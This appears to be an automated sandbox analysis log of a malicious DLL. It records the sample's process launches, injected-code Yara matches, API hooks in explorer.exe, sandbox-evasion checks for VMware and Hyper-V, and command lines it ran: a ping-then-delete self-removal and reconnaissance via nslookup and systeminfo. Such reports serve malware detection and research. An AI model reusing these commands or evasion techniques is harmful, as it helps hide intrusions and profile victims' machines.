                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5431.tmp" "c:\Users\user\AppData\Local\Temp\dyznokx3\CSCF033825E263E4DFC98584E77F08A80E9.TMP"
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\2oCOO5LbPu.dll
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\1E0C.bi1"
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\1E0C.bi1"
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "systeminfo.exe > C:\Users\user\AppData\Local\Temp\2E09.bin1"
                      Source: C:\Windows\explorer.exe Process created: unknown unknown
                      Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
                      Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Windows\System32\rundll32.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eix4r5e5.krv.ps1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_036D68BD CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification, 2_2_036D68BD
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1
                      Source: C:\Windows\System32\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{60D7F404-3F23-92D7-C994-E3E60D08C77A}
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3104:120:WilError_01
                      Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{5064A2E5-6FEB-0222-7984-1356BDF8F7EA}
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3688:120:WilError_01
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4948:120:WilError_01
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1008:120:WilError_01
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6688:120:WilError_01
                      Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{CC5B86B9-BBE4-DE12-A5C0-1FF2A9F4C346}
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{8CCBC699-7B11-9ED8-6580-DFB269B48306}
                      Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\nslookup.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                      Source: C:\Windows\explorer.exe File opened: C:\Windows\SYSTEM32\msftedit.dll
                      Source: Window Recorder Window detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                      Source: 2oCOO5LbPu.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.pdb8 source: powershell.exe, 00000014.00000002.566709177.0000012312B1D000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000002.00000003.381155615.00000000068B0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.385084346.00000000068B0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\in\the\town\where\ahung.pdb source: 2oCOO5LbPu.dll
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000002.00000003.381155615.00000000068B0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.385084346.00000000068B0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.pdbXP source: powershell.exe, 00000014.00000002.568732109.0000012312B68000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_036D7EA0 push ecx; ret 2_2_036D7EA9
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_036D828B push ecx; ret 2_2_036D829B
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_06273495 push ecx; mov dword ptr [esp], 00000002h 2_2_06273496
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_06293D9F push ecx; ret 2_2_06293DAF
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_06281040 push es; retf 2_2_06281041
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_062938A0 push ecx; ret 2_2_062938A9
                      Source: C:\Windows\System32\control.exe Code function: 24_2_00544492 push ss; ret 24_2_00544493
                      Source: C:\Windows\System32\rundll32.exe Code function: 37_2_000001572393793F pushfd ; retf 37_2_0000015723937940
                      Source: C:\Windows\System32\rundll32.exe Code function: 37_2_0000015723954492 push ss; ret 37_2_0000015723954493
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_062786AD LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_062786AD
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.cmdline
                      Source: 2oCOO5LbPu.dll Static PE information: section name: .erloc
                      Source: ykprd3xj.dll.22.dr Static PE information: real checksum: 0x0 should be: 0x2507
                      Source: 2oCOO5LbPu.dll Static PE information: real checksum: 0x79835 should be: 0x763dc
                      Source: dyznokx3.dll.25.dr Static PE information: real checksum: 0x0 should be: 0x14bd
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.dll

                      Hooking and other Techniques for Hiding and Protection

                      Source: Yara match File source: 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000003.322984868.000000000576C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000003.274118654.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000003.274312246.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000003.274347577.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000003.274283989.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000003.274051962.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000003.320061792.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000003.274249118.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000003.274172697.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000003.322240934.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000003.274335301.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2284, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: powershell.exe PID: 6680, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: control.exe PID: 7000, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5180, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4724, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4960, type: MEMORYSTR
                      Source: Yara match File source: 2.3.rundll32.exe.52f94a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 2.3.rundll32.exe.52f94a0.10.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 2.2.rundll32.exe.36d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 2.3.rundll32.exe.586a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 2.3.rundll32.exe.5916b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 2.3.rundll32.exe.586a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 2.3.rundll32.exe.58e94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000018.00000000.389053919.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000018.00000000.388260255.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000024.00000000.486983679.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000002.443486378.00000000055EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000025.00000000.462400330.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000031.00000000.558152492.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000025.00000000.459537251.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000024.00000000.477935242.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000031.00000000.564931591.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000025.00000000.457650173.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000002D.00000000.534482367.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000024.00000000.471067441.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000003.442564309.00000000052F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000002D.00000000.515611246.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000031.00000000.554617664.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000002D.00000000.528687963.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000018.00000000.390009566.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000003.322078024.000000000586A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000003.322135875.00000000058E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
                      Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\2oCOO5LbPu.dll
                      Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FF80250521C
                      Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
                      Source: explorer.exe EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FF802505200
                      Source: C:\Windows\SysWOW64\rundll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: RuntimeBroker.exe, 0000002D.00000000.502166854.000001FFC2000000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.513265661.000001FFC2000000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.495786789.000001FFC2000000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.526561852.000001FFC2000000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.490570180.000001FFC2000000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.507573940.000001FFC2000000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.532262658.000001FFC2000000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\SYSTEM32\MSTRACER.DLL5
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6808 Thread sleep time: -7378697629483816s >= -30000s
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6733
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2704
                      Source: C:\Windows\SysWOW64\rundll32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.dll
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_0627FD47 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,2_2_0627FD47
                      Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user
                      Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\ActionCenterCache
                      Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local
                      Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows
                      Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Microsoft
                      Source: explorer.exe, 0000001B.00000000.408453384.00000000051AC000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                      Source: explorer.exe, 0000001B.00000000.411018486.00000000051F7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: -94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}71USER
                      Source: explorer.exe, 0000001B.00000000.443315532.0000000006005000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000001B.00000000.443315532.0000000006005000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
                      Source: control.exe, 00000018.00000002.474123133.000001D83E5E6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSIdRom&Ven_NECVMWar&Prod_VMware_
                      Source: RuntimeBroker.exe, 00000031.00000000.538603337.0000018280A54000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000001B.00000000.443315532.0000000006005000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: 2E09.bin.27.dr Binary or memory string: gencounter Microsoft Hyper-V Gene Kernel
                      Source: 2E09.bin.27.dr Binary or memory string: vmgid Microsoft Hyper-V Gues Kernel
                      Source: 2E09.bin.27.dr Binary or memory string: bttflt Microsoft Hyper-V VHDP Kernel
                      Source: explorer.exe, 0000001B.00000000.411018486.00000000051F7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                      Source: 2E09.bin.27.dr Binary or memory string: vpci Microsoft Hyper-V Virt Kernel
